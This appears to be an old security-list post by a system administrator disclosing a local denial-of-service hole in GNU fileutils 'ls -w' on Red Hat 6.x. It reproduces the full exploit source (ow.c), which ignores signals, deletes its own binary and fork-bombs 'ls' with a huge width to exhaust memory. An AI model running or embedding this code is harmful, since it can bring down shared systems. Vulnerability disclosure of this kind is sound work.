Morning,
I recently discovered that a local user could compile a short program
(ow.c) that would when run sucessfully grind a GNU fileutils system to a
complete halt. I have tried this program on Redhat 6.1 & 6.2 and both
come down the same way.
It apparantly takes advantage of the way ls -w doesn't check for bounds
and will allocate memory until it is exhausted.
I am running Redhat 6.1 (Kernel 2.2.16-3smp), with version 4.0p of (ls -
fileutils). I also attach the offending code I tracked down from
rootshell.com.
--
System Admin - h66md.dyndns.org
Redhat Linux 6.1 [2.2.16-3smp]
/*
[ow.c by DjLizard]
This one's heinous. ow exploits a hole I found in ls awhile back.
'-w' is the ls parameter for screen width. It has no bounds checking, and will
gladly allocate enough memory to display a listing on, say, a 100,000 column
terminal. This, coupled with the old fork bomb technique and signal ignoring,
make this one hell of a DoS attack.
Don't try this anywhere *but* home. I am not responsible for *you*.
[SXN]
*/
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
main(int a,char **b)
{
for (int c=1; c < 31; c++) signal (c, 1);
unlink(b[0]);
for(;;){fork();system("/bin/ls -w 100000 /dev");}
}
